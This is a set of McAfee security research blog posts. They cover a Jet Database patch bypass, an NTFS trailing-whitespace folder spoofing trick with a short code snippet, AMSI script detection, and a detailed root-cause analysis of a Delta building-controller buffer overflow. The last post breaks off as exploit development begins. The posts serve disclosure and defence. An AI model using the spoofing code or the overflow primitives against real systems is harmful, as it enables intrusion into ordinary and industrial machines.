Adding further complexity to the attack, many mobile device exploits today require more than a single vulnerability to be successful; in many cases, 3-4 bugs are required to achieve elevated remote code execution on a target system. This is typically due to mitigations such as sandboxes/containers, restrictions on code execution, and reduced user privileges, making a chain of vulnerabilities necessary. This complexity reduces the success rate of an attack based on the likelihood of one or more of the bugs being discovered and “burned,” or patched out by the vendor.

Apple is a strong player in the responsible disclosure arena, recently expanding its offering of up to $1 million USD for certain vulnerabilities. Vulnerability brokers, who resell vulnerabilities, will reportedly pay up to $3 million USD for zero-interaction remote code execution vulnerabilities on iOS. It's easy to understand the value of bugs that don't require interaction from the victim and result in full remote code execution. With the popularity of Apple's operating systems across mobile devices and laptops, even these prices may not be enough to encourage threat actors to choose responsible disclosure over more nefarious purposes.

The Power of Vulnerability Disclosure

Two of the most significant questions this discovery raises are how was this adversary able to operate for so long, primarily using known exploits, and what kind of impact were they able to achieve?

These questions bring us full circle to the value of vulnerability disclosure. Through hardware and software analysis and responsible disclosure, meaningful progress can be made towards exposing these types of vulnerabilities before they can be leveraged by bad actors for nefarious purposes.

The post Apple iOS Attack Underscores Importance of Threat Research appeared first on McAfee Blogs.

Analyzing and Identifying Issues with the Microsoft Patch for CVE-2018-8423

Introduction

As of July 2019, Microsoft has fixed around 43 bugs in the Jet Database Engine. McAfee has reported a couple of bugs and, so far, we have received 10 CVEs from Microsoft. In our previous post, we discussed the root cause of CVE-2018-8423. While analyzing this CVE and the patch from Microsoft, we found that there was a way to bypass it, which resulted in another crash. We reported it to Microsoft, and it was fixed in the January 2019 Patch Tuesday update. This issue was assigned CVE-2019-0576. We recommend that our users install the appropriate patches, follow a proper patch management policy, and keep their Windows installations up to date.

In this post we will do the root cause analysis of CVE-2019-0576. To exploit this vulnerability, an attacker needs to use social engineering techniques to convince a victim to open a JavaScript file which uses an ADODB connection object to access a malicious Jet Database file. Once the malicious Jet Database file is accessed, it calls the vulnerable function in msrd3x40.dll which can lead to exploitation of this vulnerability.

Background

As mentioned in our previous post, CVE-2018-8423 can be triggered using a malicious Jet Database file and, as per the analysis, this issue was in the index number field. If the index number was too big the program would crash at the following location:

Here, ecx contains the malicious index number. On applying the Microsoft patch for CVE-2018-8423 we can see that, on opening this malicious file, we get the following error which denotes that the issue is fixed, and the crash does not occur anymore:

 

Analyzing the Patch

We decided to dig deeper and see exactly how this issue was patched. On analyzing the "msrd3x40!TblPage::CreateIndexes" function, we can see that there is a check on whether "IndexNumber" is greater than 0xFF (255), as can be seen below:

 

Here, the ecx which contains the index number has the malicious value of “00002300” and it is greater than 0xFF. If we see the code, there is a jump instruction. If we follow this jump instruction, we reach the following location:

We can see that there is a call to the “msrd3x40!Err::SetError” function, meaning the malicious file will not be parsed if the index value is greater than 0xFF and the program will give the error message “Unrecognized database format” and terminate.

Finding Another Issue with the Patch

By looking at the patch, it was obvious that the program will terminate if the index value is greater than 0xFF, but we decided to try it with an index value of "00 00 00 20", which is less than 0xFF, and we got another crash in the function "msrd3x40!Table::FindIndexFromName", as can be seen below:

Finding the Root Cause of the New Issue

As we know, if we give any index value which is less than 0xFF, we get a crash in the function "msrd3x40!Table::FindIndexFromName", so we decided to analyze it further to find out why that is happening.

The crash is at the following location:

It seems that the program is trying to access the location "[ebx+eax*4+574h]" but it is not accessible, meaning this is an out-of-bounds read issue.

This crash looks familiar, as a similar one was seen in CVE-2018-8423, except that it was an out-of-bounds write, while this seems to be an out-of-bounds read. If we look at eax, it contains "0055b7a8" which, when multiplied by 4, becomes a very large value.

If we look at the file it looks like this:

As can be seen in below image, if we parse this file, this value of “00 00 00 20” (in little endian from the above image), denotes the number of an index whose name is “ParentIDName”:

Looking at the debugger at the point of the crash, it seems that ebx+574h points to a memory location and eax contains an index value which is getting multiplied by 4. Now we need to figure out the following:

  1. What will be the value of eax that will cause the crash? We know that it should be less than 0xFF. But what would be the lowest value?
  2. What is the root cause of this issue?

On setting a breakpoint on “msrd3x40!Table::FindIndexFromName” and changing the index number to “0000001f”, (which does not cause a crash but helps with the debugging and understanding the program flow) we can see that edx contains the pointer to an index name which, in this case, is “ParentIdName”:

Debugging further we can see that the eax value comes from [ebp] and the ebp value comes from [ebx+5F4h] as can be seen below:

When we look at “ebx+5F4” we can see the following:

We can see that "ebx+5F4" contains the index numbers for all the indexes in the file. In our case the file has two indexes and their numbers are "00 00 00 01" and "00 00 00 1f". If we carefully review the memory we can figure out that the maximum number of indexes which can be stored here is 0x20, or 32:

Start location: 00718d54

Each index number is 4 bytes long. So 0x20*4 + 00718d54 = 00718DD4

After this, if we look at ebx+574+4, we can see that it contains the pointer to index names:

So, the overall memory structure is like this:

There are only 0x80, or 128, bytes available to save index name pointers at location EBX+574. Each pointer gets saved at its index number's slot, i.e. the pointer for index number 1 will be saved at EBX+574+1*4, the pointer for index number 2 at EBX+574+2*4, and so on (index numbers start from 0).
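A hypothetical reconstruction of this layout, with structure and field names of our own choosing (not Microsoft's), helps visualize the overwrite:

#include <cstdint>

struct TableIndexState {                // sketch of the object pointed to by EBX
    // ... preceding fields ...
    char*    indexNamePtrs[0x20];       // at EBX+0x574: room for 32 pointers (0x80 bytes)
    uint32_t indexNumbers[0x20];        // at EBX+0x5F4: index numbers parsed from the file
};

// The flawed store: the name pointer is written at the file-supplied index number
// with no bounds check against the 32-slot array.
void StoreIndexName(TableIndexState* state, uint32_t indexNumberFromFile, char* namePtr) {
    state->indexNamePtrs[indexNumberFromFile] = namePtr;
    // indexNumberFromFile == 0x20 lands exactly on indexNumbers[0], replacing a small
    // index number with a pointer value; the later read "mov ecx, [ebx+eax*4+574h]"
    // then uses that pointer-sized value as an index, far out of bounds.
}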

In this case, if we give an index number which is more than 31, the program will overwrite data past 0x80 bytes, which will be at the start of the EBX+5F4 location, which is the index number from the malicious file. So, in this case, if we give the value “00 00 00 20” instead of “00 00 00 1f”, it will overwrite the index number at the EBX+5F4 location, as can be seen below:

Now the program tries to execute this instruction in "msrd3x40!Table::FindIndexFromName":

Mov ecx, dword ptr [ebx+eax*4+574h]

Here, eax should contain the index number "00 00 00 01" but, since it has been overwritten by "0055b7a8", which is a memory address, multiplying it by 4 and adding 574h produces a huge value. If the resulting memory area does not exist and the program tries to read from it, we get an access violation error.

So, to answer the questions we had:

  1. Any value which is less than 0xFF and greater than or equal to 0x20 (32) will cause a crash if the resulting memory location from [ebx+eax*4+574h] is not accessible.
  2. The root cause is that an index number is getting overwritten by a memory location, causing invalid memory access in this case.

How is it Fixed by Microsoft in the Jan 19 Patch?

We again decided to analyze the patch to see how this issue was fixed. As is clear from the analysis, any value which is greater than or equal to 0x20 or 32 still causes a crash so, ideally, the patch should be checking this. Microsoft has added this check in the Jan 19 patch release, as can be seen below:

As can be seen in the above image, eax holds the index value here and it is compared with 0x20. If it is greater than or equal to 0x20, the program jumps to location 72fe1c00. If we go to that location, we can see the following:

As can be seen in the above image, it calls the destructor and then calls msrd3x40!Err::SetError function and returns. So, the program will display a message saying, “Unrecognized database format” and then terminate.

Conclusion

We reported this issue to Microsoft in October 2018 and it was fixed in the January 2019 Patch Tuesday release. The issue was assigned CVE-2019-0576. We recommend our users keep their Windows installations up to date and install vendor patches on a regular basis.

McAfee Coverage:

McAfee Network Security Platform customers are protected from this vulnerability by Signature IDs 0x45251700 – HTTP: Microsoft JET Database Engine Remote Code Execution Vulnerability (CVE-2018-8423) and 0x4525890 – HTTP: Microsoft JET Database Engine Remote Code Execution Vulnerability (CVE-2019-0576).

McAfee AV detects the malicious file as BackDoor-DKI.dr.

The McAfee HIPS Generic Buffer Overflow Protection (GBOP) feature will often cover this, depending on the process used to exploit the vulnerability.

References

The post Analyzing and Identifying Issues with the Microsoft Patch for CVE-2018-8423 appeared first on McAfee Blogs.

The Twin Journey, Part 3: I’m Not a Twin, Can’t You See my Whitespace at the End?

In this series of three blogs (you can find part 1 here, and part 2 here) we have so far covered the implications of promoting files to "Evil Twins," which can be created and remain in the system as different entities once case sensitivity is enabled, and some issues that can arise from basic assumptions about case sensitivity during development.

In this third post we focus on the "confusion" technique. Even though the technique is already known (Medium / Tyranidslair), the ramifications of these effects have not all been analyzed yet.

Going back to normalization, some Win32 API’s remove trailing whitespaces (and other special characters) from the path name.

As mentioned in the last publication, the normalization can, in some cases, provide the wrong result.

The common scenario that could be used as “bait” for the user to click, and even to hide what is seen, is to create a directory with the same name ending with a whitespace.
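For reference, a trailing-space twin can be created by bypassing normalization with the \\?\ device-path prefix; the sketch below uses a hypothetical path for illustration:

#include <windows.h>
#include <cstdio>

int main() {
    // Normalized path: the Win32 layer strips the trailing space, creating (or resolving to) "demo".
    CreateDirectoryA("C:\\Users\\Public\\demo ", nullptr);
    // Literal path: the \\?\ prefix skips normalization, so "demo " (with the space) is created.
    CreateDirectoryW(L"\\\\?\\C:\\Users\\Public\\demo ", nullptr);
    printf("Two folders now normalize to the same display name in Explorer.\n");
    return 0;
}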

A very trivial example “That’s not my notepad…..”:

Open Task Manager, right-click the "notepad" with the PuTTY icon -> Properties. (The properties are read from the "non-trailing-space" binary.)

Open Explorer on “C:\Windows “; it will generate the illusion that the original files (from the folder without trailing whitespace) are there. This will happen for any folder/file not present in the whitespace version.

Screenshots opening a McAfee Agent Folder:

Both folders opened; note that the whitespace version does not contain any .dll or additional .exe files, yet Explorer renders the missing files from the normalized, non-whitespace directory.

Trying to open the dll…

Getting properties from Task Manager will fetch those from the normalized folder path, which means you can be tricked into thinking it is a trusted app.

Watch the video recorded by our expert Cedric Cochin illustrating this technique:

Related Links / Blogs:

https://tyranidslair.blogspot.com/2019/02/ntfs-case-sensitivity-on-windows.html

https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e

The post The Twin Journey, Part 3: I’m Not a Twin, Can’t You See my Whitespace at the End? appeared first on McAfee Blogs.

McAfee AMSI Integration Protects Against Malicious Scripts

Following on from the McAfee Protects against suspicious email attachments blog, this blog describes how AMSI (the Antimalware Scan Interface) is used within the various McAfee Endpoint products. The AMSI scanner within McAfee ENS 10.6 has already detected over 650,000 pieces of malware since the start of 2019. This blog will help show you how to enable it, and explain why it should be enabled, by highlighting some of the malware we are able to detect with it.

ENS 10.6 and Above

The AMSI scanner scans scripts as they are executed. This enables the scanner to see the de-obfuscated script content and scan it using DAT content. This is useful because the original scripts can be heavily obfuscated and are difficult to detect generically, as shown in the image below:

Figure 1 – Obfuscated VBS script being de-obfuscated with AMSI
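To show where AMSI sits in this flow, here is a minimal sketch (not McAfee's implementation) of how a script host hands a de-obfuscated buffer to whichever AMSI provider, such as ENS, is registered:

#include <windows.h>
#include <amsi.h>
#pragma comment(lib, "amsi.lib")

int main() {
    HAMSICONTEXT ctx = nullptr;
    HAMSISESSION session = nullptr;
    if (FAILED(AmsiInitialize(L"DemoScriptHost", &ctx))) return 1;
    AmsiOpenSession(ctx, &session);

    // The buffer passed to AMSI is the decoded script content, which is why the
    // scanner sees through obfuscation applied to the file on disk.
    const wchar_t script[] = L"CreateObject(\"WScript.Shell\").Run \"calc.exe\"";
    AMSI_RESULT result = AMSI_RESULT_CLEAN;
    AmsiScanBuffer(ctx, (PVOID)script, sizeof(script), L"demo.vbs", session, &result);

    if (AmsiResultIsMalware(result)) {
        // A provider running in block mode causes the host to abort execution at this point.
    }
    AmsiCloseSession(ctx, session);
    AmsiUninitialize(ctx);
    return 0;
}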

Enable the Scanner

By default, the AMSI scanner is set to observe mode. This means that the scanner is running but it will not block any detected scripts; instead the detection will appear in the ENS log and event viewer as shown below:

Figure 2 – Would Block in the Event log

To actively block the detected threats, you need to de-select the following option in the ENS settings:

Figure 3 – How to enable Blocking

Once this has been done, the event log will show that the malicious script has now been blocked:

Figure 4 – Action Blocked in Event Log

In the Wild

Since January 2019, we have observed over 650,000 detections and this is shown in the IP Geo Map below:

Figure 5 – Geo Map of all AMSI detection since January 2019

We are now able to block some of the most prevalent threats with AMSI. These include PowerMiner, Fileless MimiKatz and JS downloader families such as JS/Nemucod.

The section below describes how these families operate, and their infection spread across the globe.

PowerMiner

PowerMiner is cryptocurrency-mining malware whose purpose is to infect as many machines as possible to mine Monero. The initial infection vector is phishing email containing a batch file. Once executed, this batch file downloads a malicious PowerShell script which then begins the infection process.

The infection flow is shown in the graph below:

Figure 6 – Infection flow of PowerMiner

With the AMSI scanner, we can detect the malicious PowerShell script and stop the infection from occurring. The Geo IP Map below shows how this malware has spread across the globe:

Figure 7 – Geo Map of PS/PowerMiner!ams  detection since January 2019

McAfee Detects PowerMiner as PS/PowerMiner!ams.a.

Fileless Mimikatz

Mimikatz is a tool which enables the extraction of passwords from the Windows LSASS. Mimikatz was previously used as a standalone tool; however, malicious scripts have been created which load Mimikatz directly into memory and execute it without it ever being written to the local disk. An example of a fileless Mimikatz script is shown below (note: this can be heavily obfuscated):

Figure 8 – Fileless Mimikatz PowerShell script

The Geo IP Map below shows how fileless Mimikatz has spread across the globe:

Figure 9 – Geo IP Map of PS/Mimikatz detection since January 2019

McAfee can detect this malicious script as PS/Mimikatz.a, PS/Mimikatz.b, PS/Mimikatz.c.

JS/Downloader

JS downloaders are usually spread via email. The purpose of these JavaScript files is to download further payloads such as ransomware, password stealers and backdoors to further exploit the compromised machine. The infection chain is shown below, as well as an example phishing email:

Figure 10 – Infection flow of Js/Downloader

Figure 11 – Example phishing email distributing JS/Downloader

Below is the IP Geo Map of AMSI JS/Downloader detections since January 2019:

Figure 12 – Geo Map of AMSI-FAJ detection since January 2019

The AMSI scanner detects this threat as AMSI-FAJ.

MVISION Endpoint and ENS 10.7

MVISION Endpoint and ENS 10.7 (not yet released) will use Real Protect machine learning to detect PowerShell AMSI-generated content.

This is done by extracting features from the AMSI buffers and running these against the ML classifier to decide if the script is malicious or not. An example of this is shown below:

 

Thanks to this detection technique, MVISION EndPoint can detect Zero-Day PowerShell threats.

Conclusion

We hope that this blog has helped highlight why enabling AMSI is important and how it will help keep your environments safe.

We recommend our customers who are using ENS 10.6 on a Windows 10 environment enable AMSI in ‘Block’ mode so that when a malicious script is detected it will be terminated. This will protect Endpoints from the threats mentioned in this blog, as well as countless others.

Customers using MVISION EndPoint are protected by default and do not need to enable ‘Block’ mode.

We also recommend reading McAfee Protects against suspicious email attachments which will help protect you against malware being spread via email, such as the JS/Downloaders described in this blog.

All testing was performed with the V3 DAT package 3637.0 which contains the latest AMSI Signatures. Signatures are being added to the V3 DAT package daily, so we recommend our customers always use the latest ones.

The post McAfee AMSI Integration Protects Against Malicious Scripts appeared first on McAfee Blogs.

From Building Control to Damage Control: A Case Study in Industrial Security Featuring Delta’s enteliBUS Manager

Management. Control. It seems that you can’t stick five people in a room together without one of them trying to order the others around. This tendency towards centralized authority is not without reason, however – it is often more efficient to have one person, or thing, calling the shots. For an example of the latter, one needs look no further than Delta’s enteliBUS Manager, or eBMGR. Put simply, this device aims to centralize control for various pieces of hardware often found in corporate or industrial settings, whether it be temperature and humidity controls for a server room, a boiler and its corresponding alarms and sensors in a factory, or access control and lighting in a business. The advantages seem obvious, too – it can be configured to adjust fan speeds according to thermostat readings or sound an alarm if pressure crosses a certain threshold, all with little human interaction.

The disadvantages, while less obvious, become clear when one considers tech-savvy malicious actors. Suddenly, your potentially critical system now has a single point of failure, and one that is attached to a network, to make matters worse.

Consider for a moment a positive pressure room in a hospital, the kind typically used to keep out contaminants during surgeries. Managing rooms such as these is a typical application for the eBMGR and it does not take an overactive imagination to envision what kind of damage a bad actor could cause if they disrupted such a sensitive environment.

Management. Control. That’s what’s at stake if a device such as this is not properly secured. It’s also what made this device such a high priority for McAfee’s Advanced Threat Research team. The decision to make network-connected critical systems such as these demands an extremely high standard of software security – finding where it might fall short is precisely our job.

With these stakes in mind, our team went to work. We began by hooking up an eBMGR unit to a network with several other devices to simulate an environment somewhat true to life. Using a technique known as "fuzzing", we then blasted the device with all kinds of deliberately malformed network traffic, looking for a chink in the armor. That is one advantage often afforded to the bad guys in software security: they can make many mistakes; manufacturers need only make one.

Perhaps unsurprisingly, persistence and creativity led us to discover one such mistake: a mismatch in the memory sizes used to handle incoming network data created what is often referred to as a buffer overflow vulnerability. This seemingly innocuous mistake rendered the eBMGR vulnerable to our carefully crafted network attack, which allows a hacker on the same network to gain complete control of the device’s operating system. Worse still, the attack uses what is known as broadcast traffic, meaning they can launch the attack without knowing the location of the targets on the network. The result is a twisted version of Marco Polo – the hacker needs only shout “Marco!” into the darkness and wait for the unsuspecting targets to shout “Polo!” in response.

In this field, complete control of the operating system is typically the finish line. But we weren’t content with just that. After all, controlling the eBMGR on its own is not all that interesting; we wanted to see if we could use it to control all the devices it was connected to. Unfortunately, we did not have the source code for the device’s software, so this new goal proved non-trivial.

We went back to the drawing board and acquired some additional hardware that the Delta device might realistically be charged with managing and had a certified technician program the device just as he would for a real-world client – in our case, as an HVAC controller. Our strategy quickly became what is often referred to as a replay attack. As an example, if we wanted to determine how to tell the device to flip a switch, we would first observe the device flipping the switch in the “normal” way and try to track down what code had to run for that to happen. Next, we would try to recreate those conditions by running that code manually, thus replaying the previously observed event. This strategy proved effective in granting us control over every category of device the eBMGR supports. Moreover, this method remains agnostic to the specific hardware attached to the building manager. Hypothetically, this sort of attack would work without any prior knowledge of the device’s configuration.

The result was an attack that would compromise any enteliBUS Manager on the same network and attach a custom piece of malware we developed to the software running on it. This malware would then create a backdoor which would allow the attacker to remotely issue commands to the manager and control any hardware connected to it, whether it be something as benign as a light switch or as dangerous as a boiler.

To make matters worse, if the attacker knows the IP address of the device ahead of time, this exploit can be performed over the Internet, increasing its impact exponentially. At the time of this writing, a Shodan scan revealed that over 1600 such devices are internet connected, meaning the danger is far from hypothetical.

For those craving the nitty-gritty technical details of how we went about accomplishing this, we also published what is arguably a novella here that delves into the vulnerability discovery and exploitation process from start to finish.

In keeping with our responsible disclosure program, we reached out to Delta Controls as soon as we confirmed that the initial vulnerability we discovered was exploitable. Shortly thereafter, they provided us with a beta version of a patch meant to fix the vulnerability and we confirmed that it did just that – our attack no longer worked. Furthermore, by using our understanding of how the attack is performed at a network level, we were able to add mitigation for this vulnerability to McAfee’s Network Security Platform (NSP) via NSP signature 0x45d43f00, helping our customers remain secure. This is our idea of a success story – researchers and vendors coming together to improve security for end users and ultimately reduce the attack surface for the adversary. If there’s any doubt they are interested in targets like these, a quick search will illuminate the myriad attempts to exploit industrial control systems as a top target of interest.

Before we leave you with "all's well that ends well", we want to stress that there is a lesson to be learned here: it doesn't take much to make a critical system vulnerable. Thus, it is important that companies extend proper security practices to all network-connected devices – not just PCs. Such practices might include placing all internet-connected devices behind a firewall, monitoring traffic to these devices, segregating them from the rest of the network using VLANs, and staying on top of security updates. For critical systems that cannot afford significant downtime, updates are often pulled instead of pushed, putting the onus on end users to keep these devices up to date. Whatever the precise implementation may be, a good security policy often begins by adopting the principle of least privilege, or the idea that all access should be restricted by default unless there is a compelling reason for it. For example, before approaching the challenge of keeping a device like the eBMGR secure on the internet, it's important to first ask if having it connected to the internet is necessary in the first place.

While companies and consumers should certainly take the proper steps to keep their networks secure, manufacturers must also take a proactive approach towards addressing vulnerabilities that impact their end users. Delta Controls’ willingness to collaborate and timely response to our disclosure certainly seems like a step in the right direction. Please refer to the following statement from Delta Controls which provides insight into the collaboration with McAfee and the power of responsible disclosure.

The post From Building Control to Damage Control: A Case Study in Industrial Security Featuring Delta’s enteliBUS Manager appeared first on McAfee Blogs.

HVACking: Understanding the Delta Between Security and Reality

The McAfee Labs Advanced Threat Research team is committed to uncovering security issues in both software and hardware to help developers provide safer products for businesses and consumers. We recently investigated an industrial control system (ICS) produced by Delta Controls. The product, called “enteliBUS Manager”, is used for several applications, including building management. Our research into the Delta controller led to the discovery of an unreported buffer overflow in the “main.so” library. This flaw, identified by CVE-2019-9569, ultimately allows for remote code execution, which could be used by a malicious attacker to manipulate access control, pressure rooms, HVAC and more. We reported this research to Delta Controls on December 7th, 2018. Within just a few weeks, Delta responded, and we began an ongoing dialog while a security fix was built, tested and rolled out in late June of 2019. We commend Delta for their efforts and partnership throughout the entire process.

The vulnerable firmware version tested by McAfee’s Advanced Threat Research team is 3.40.571848. It is likely earlier versions of the firmware are also vulnerable, however ATR has not specifically tested these. We have confirmed the patched firmware version 3.40.612850 effectively remediates the vulnerability.

This blog is intended to provide a deep and thorough technical analysis of the vulnerability and its potential impact. For a high-level, non-technical walk through of this vulnerability, please refer to our summary blog post here.

Exploring the Attack Surface

The first task when researching a new device is to understand how it works from both a software and hardware perspective. Like many devices in the ICS realm, this device has three main software components; the bootloader, system applications, and user-defined programming. While looking at software for an attack vector is important, we do not focus on any surface which is defined by the users since this will potentially change for every install. Therefore, we want to focus on the bootloader and the system applications. With the operating system, it is common for manufacturers to implement custom code to operate the device regardless of an individual user’s programming. This custom code is often where most vulnerabilities exist and extends across the entire product install base. Yet, how do we access this code? As this is a critical system, the firmware and software are not publicly available and there is limited documentation. Thus, we are limited to external reconnaissance of the underlying system software. Since the most critical vulnerabilities are remote, it made sense to start with a simple network scan of the device. A TCP scan showed no ports open and a UDP scan only showed ports 47808 and 47809 to be open. Referring to the documentation, we determined this is most likely used for a protocol called Building Automation Control Network (BACnet). Using a BACnet-specific network enumeration script, we determined slightly more information:

root@kali:~# nmap --script bacnet-info -sU -p 47808 192.168.7.15

Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 11:03 EDT
Nmap scan report for 192.168.7.15
Host is up (0.00032s latency).

PORT STATE SERVICE
47808/udp open bacnet
| bacnet-info: 
| Vendor ID: Delta Controls (8)
| Vendor Name: Delta Controls
| Object-identifier: 29000
| Firmware: 571848
| Application Software: V3.40
| Model Name: eBMGR-TCH

The next question is, what can we learn from the hardware? To answer this question, the device was first carefully disassembled, as shown in Figure 1.

Figure 1

The controller has one board to manage the display and a main baseboard which holds a System on a Module (SOM) chip containing both the processor and flash modules. With a closer look at the baseboard, we made a few key observations. First, the processor is an ARM926EJ core processor, the flash module is a ball grid array (BGA) chip, and there are several unpopulated headers on the board.

Figure 2

To examine the software more effectively, we needed to determine a method of extracting the firmware. The BGA chip used by the system for flash memory will most likely hold the firmware; however, this poses another challenge. Unlike other chips, BGA chips do not provide pins externally which can be attached to. This means that to access the chip directly, we would need to desolder it from the board. This is not ideal since we risk damaging the system.

We also noticed several unpopulated headers on the board. This was promising, as we might find an alternative method of extracting the firmware using one of these headers. Soldering pins to each of the unpopulated headers and using a logic analyzer, we determined that the 4-pin header in the center of the board is a universal asynchronous receiver-transmitter (UART) header running at a baud rate of 115200.

Figure 3

Using the Exodus XI Breakout board (shout out to @Logan_Brown and the Exodus team) to connect to the UART headers, we were met with an unprotected root prompt on the system. Now with full access to the system, we could start to gain a deeper understanding of how the system works and extract the firmware.

Figure 4

Firmware Extraction and System Analysis

With the UART interface, we could now explore the system in real-time, but how could we extract the firmware for offline analysis? The device has two USB ports which we were able to use to mount a USB drive. This allowed us to copy what is running in memory using dd onto a flash drive, effectively extracting the firmware. The next question was, what do we copy?

Using "/proc/mtd" to gain information about how memory is partitioned, we could see file systems located on mtd4 and mtd5. We used dd to copy off both the mtd4 and mtd5 partitions. We later discovered that one of the images is a backup used as a system fallback if a persistent issue is detected. This copied filesystem became increasingly useful as the project continued.

With the active UART connection, it was now possible to investigate more about how the system is running. Since we were able to previously determine the device is only listening on ports 47808 and 47809, whichever application is listening on these ports would be the only point of an attack for a remote exploit. This was quickly confirmed using “netstat -nap” from the UART console.

We noticed that port 47808 was being used by an application called "dactetra". With minimal further investigation, we determined that this is a Delta-specific binary responsible for the main functions of the device.

Finding a Vulnerability

With a device-specific binary listening on the network via an open port, we had an ideal place to start looking for a vulnerability. We used the common approach of network fuzzing to start our investigation. To implement network fuzzing for BACnet, we turned to a tool produced by Synopsys called Defensics, which has a module designed for BACnet servers. Although this device is not a BACnet server and functions more as a router, this test suite provided several universal test cases which gave us a great place to start. BACnet utilizes several types of broadcast packets to communicate. Two such broadcast packets, “Who-Is” and “I-Am” packets, are universal to all BACnet devices and Defensics provides modules to work with them. Using the Defensics fuzzer to create mutations of these packets, we were able to observe the device encountering a failure point, producing a core dump and immediately rebooting, shown in Figure 5.

Figure 5

The test case which caused the crash was then isolated and run several more times to confirm the crash was repeatable. We discovered during this process that it takes an additional 96 packets sent after the original malformed packet to cause the crash. The malformed packet in the series was an “I-Am” packet, as seen below. The full packet is not shown due to its size.

Figure 6

Examining further, we could quickly see that the fuzzer created a packet with a BACnet layer size of 8216 bytes, using “0x22”. We could also see the fuzzer recognized the max acceptable size for the BACnet application layer as only 1476 bytes. Additional testing showed that sending only this packet did not produce the same results; only when all 97 packets were sent did the crash occur.

Analyzing the Crash

Since the system provides a core dump upon crashing, it was logical to analyze it for further information. From the core dump (reproduced in Figure 7), we could see the device encountered a segmentation fault. We also saw that register R0 contained what looked like data copied from our malformed packet, along with the backtrace being potentially corrupted.

Figure 7

The core dump also provided us the precise location of the crash. Using the memory map from the device, it was possible to determine that address 0x4026e580 is located in memcpy. Since the device does not deploy Address Space Layout Randomization (ASLR), the memory address did not change throughout our testing. As we had successfully extracted the firmware, we used IDA Pro to attempt to learn more about why this crash was occurring. The developers did not strip the binaries during compiling time, which helped simplify the reversing process in IDA.

Figure 8

The disassembly told us that memcpy was attempting to write what was in R3 to the “address” stored in R0. In this case, however, we had corrupted that address, causing the segmentation fault. The contents of several other registers also provided additional information. The value 0x81 in R3 was potentially the first byte of a BACnet packet from the BACnet Virtual Link Control (BVLC) layer, identifying the packet as BACnet. By looking at R3 and the values at the address in R5 together, we confirmed with more certainty that this was in fact the BVLC layer. This implied the data being copied was from the last packet sent and the destination for the copied data was taken from the first malformed packet. Registers R8 and R10 held the source and destination port numbers, respectively, which in this case were both 0xBAC0 (accounting for endianness), or 47808, the standard BACnet port. R4 held a memory address which, when examined, showed a section of memory that looks to have been overwritten. Here we saw data from our malformed packet (0x22); in some areas, memory was partially overwritten with our packet data. The value for the destination of the memcpy appeared to be coming from this region of memory. With no ASLR enabled, we could again count on this always landing in the same location.

Figure 9

At this point, with the information provided by the core dump, packets, and IDA, we were fairly certain that the crash found was a buffer overflow. However, memcpy is a very common function, so we needed to determine where exactly this crash was coming from. If the destination address for the memcpy was getting corrupted, then the crash in memcpy was simply collateral damage from the buffer overflow – so what code was causing the buffer overflow to occur? A good place to start this analysis would be the backtrace; however, as seen above, the backtrace was corrupted from our input. Since this device uses an ARM processor, we could look at the LR registers for clues on what code called this memcpy. Here, LR was pointing to 0x401e68a8 which, when referencing the memory map of the process, falls in “main.so”. After calculating the offset to use for static analysis, we arrived at the code in Figure 10.

Figure 10

The LR register was pointing to the instruction which is called after memcpy returns. In this case, we were interested in the instruction right before the address LR is pointing to, at offset 0x15C8A4. At first glance, we were surprised not to see the expected memcpy call; however, digging a little deeper into the scNetMove function we found that scNetMove is simply a wrapper for memcpy.

Figure 11

So, how did the wrong destination address get passed to memcpy? To answer this, we needed a better understanding of how the system processes incoming packets along with what code is responsible for setting up the buffers sent to memcpy. We can use ps to evaluate the system as it is running to see that the main process spawns 19 threads:

Table 1

The function wherein we found the “scNetMove” was called “scBIPRxTask” and was only referenced in one other location outside of the main binary; the initialization function for the application’s networking, shown in Figure 12.

Figure 12

In scBIPRxTask’s disassembly, we saw a new thread or “task” being created for both BACnet IP interfaces on ports 47808 and 47809. These spawned threads would handle all the incoming packets on their respective ports. When a packet would be received by the system, the thread responsible for scBIPRxTask would trigger for each packet. Using the IDA Pro decompiler, we could see what occurs for each packet. First, the function uses memset to zero out an allocated buffer on the stack and read from the network socket into this buffer. This buffer becomes the source for the following memcpy call. The new buffer is created with a static size of 1732 bytes and only 1732 bytes are appropriately read from the socket.

Figure 13

After reading data from the socket, the function sets up a place to store the packet it has just received. Here it uses a function called “pk_alloc,” which takes the size of the packet to create as its only argument. We noticed that the size was another static value and not the size received from the socket read function. This time the static value passed is 1476 bytes. This allocated buffer is what will become the destination for the memcpy.

Figure 14

With both a source and destination buffer allocated, “scNetMove” is called and subsequently memcpy is called, passing both buffers along with the size parameter taken from the socket read return value.

Figure 15

This code path explains why and how the vulnerability occurs. Each packet received is copied from the stack buffer into heap memory; however, if the packet is longer than 1476 bytes, every byte beyond 1476 (up to the 1732 read from the socket) is written past the end of the destination buffer. Within the memory which is overwritten, there is an address used as the destination of a later memcpy call. This means the buffer overflow leads to an arbitrary write condition. The first malformed packet overwrites a section of memory with attacker-defined data – in this case, the address where the attacker wishes to write to. After an additional 95 packets are read by the system, the attacker-controlled address is passed to memcpy as the destination buffer. The data in the last packet, which does not need to be malformed, is what will be written to the location set in the earlier malformed packet. Assuming the last packet is also controlled by the attacker, this is now a write-what-where condition.
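The sketch below reconstructs the vulnerable receive path described above; the function and field names approximate the decompiled code and are not Delta's actual source:

#include <cstring>
#include <sys/types.h>
#include <sys/socket.h>

struct Packet { /* header fields elided */ char data[1476]; };
static Packet* pk_alloc(size_t) { return new Packet(); }   // stand-in for the firmware's allocator

void scBIPRxTask_sketch(int sock) {
    char rxBuf[1732];
    memset(rxBuf, 0, sizeof(rxBuf));
    // Up to 1732 bytes are read from the socket...
    ssize_t len = recvfrom(sock, rxBuf, sizeof(rxBuf), 0, nullptr, nullptr);
    if (len <= 0) return;

    // ...but the destination packet buffer is always 1476 bytes.
    Packet* pkt = pk_alloc(1476);

    // scNetMove() is a thin wrapper around memcpy(); any len in (1476, 1732] overruns
    // pkt->data and clobbers adjacent heap memory, including a pointer that a later
    // memcpy uses as its destination -- the write-what-where primitive.
    memcpy(pkt->data, rxBuf, (size_t)len);
}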

Kicking the Dog

With a firm grasp on the discovered vulnerability, the next logical step was to attempt to create a working exploit. When developing an exploit, the ability to dynamically debug the target is extremely valuable. To this end, the team first had to cross-compile debugging tools such as gdbserver for the device’s specific kernel and architecture. Since the device runs an old version of the Linux kernel, we used an old version of Buildroot to build gdbserver and later other applications.

